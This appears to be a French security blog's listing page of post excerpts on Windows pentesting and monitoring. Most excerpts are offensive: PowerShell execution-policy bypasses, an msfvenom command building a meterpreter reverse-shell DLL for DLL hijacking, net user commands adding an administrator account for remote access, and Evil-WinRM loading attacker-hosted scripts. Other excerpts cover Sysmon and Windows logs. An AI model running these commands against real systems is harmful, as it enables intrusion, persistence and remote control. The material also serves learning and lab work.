Windows – Sécuriser votre site

Obtenir un maximum d’informations sur un domaine (sans powerview)

2022-04-272022-04-02 par Germain

Introduction à Active Directory et Kerberos Un AD contient plusieurs domaines et organisation unit(OU) Introduction à PowerShell Get-Help * Liste tout l’aide disponibile Get-Help process Liste tout avec le mot-clé “process” Update-Help Update-Help Get-Help Get-Item -Full Get-Help Get-Item -Examples Get-Command -CommandType cmdlet Outrepasser les politiques d’exécution PowerShell powershell -ExecutionPolicy bypass powershell -c powershell -encodedcommand $env:PSExecutionPolicyPreference=”bypass” … Continuer la lecture

DLL Hijacking

2021-08-032021-08-03 par Germain

Étapes pour réussir l’injection de DLL sous windows Identifier l’application vulnérable et son emplacement Identifer le ID du processus Identifier les DLL vulnérables qui peuvent être hijackés Remplacer la DLL d’origine Génération d’une DLL pour création d’une session meterpreter sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=53 -f dll -o not_malicious.dll Conditions pour qu’une DLL soit vulnérable … Continuer la lecture

Sysmon

2022-04-272021-07-31 par Germain

L’utilitaire sysmon qui fait partie de sysinternals est un driver qui permet de monitorer un système. Cela permet d’avoir une vue détaillée des événements critiques qui se produisent lors d’intrusions dans une machine : création de processus, connexions réseau et changement à la date de création de certains fichiers. L’analyse de ces évements avec le … Continuer la lecture

Logs de Windows

2022-04-272021-07-30 par Germain

Les logs de Windows peuvent être accédés de diverses façons Event Viewer (GUI-based application : eventvwr.msc). Observateur d’événements Wevtutil.exe (command-line tool) Get-WinEvent (PowerShell cmdlet) Liste les journaux des événements wevtutil el Lit les événements à partir d’un journal wevtutil qe Application /c:3 /rd:true /f:text PowerShell cmdlet Get-WinEvent -FilterHashTable @{ LogName=’Application’ ProviderName=’MsiInstaller’ ID=11707 } Get-WinEvent -FilterHashtable … Continuer la lecture

Ajouter un utilisateur Windows pour accès à distance RDP

2022-04-272021-07-22 par Germain

net user USERNAME PASSWORD /add net localgroup Administrators USERNAME /add net localgroup "Remote Management Users" USERNAME /add

Evil-WinRM

2022-04-272021-07-22 par Germain

Il est possible de télécharger ou téléverser des fichiers à partir de Evil-WinRM avec les commandes upload et download Il est possible de rendre accessible des scripts powershell qui se situent sur la machine de l’attaquant evil-winrm -u USERNAME -p PASSWORD -i IP -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/ Invoke-Portscan.ps1 Get-Help Invoke-Portscan Invoke-Portscan -Hosts 10.9.0.70 -TopPorts 50 Il existe … Continuer la lecture

Trucs Windows

2022-04-272021-07-19 par Germain

net user /add net localgroup administrators /add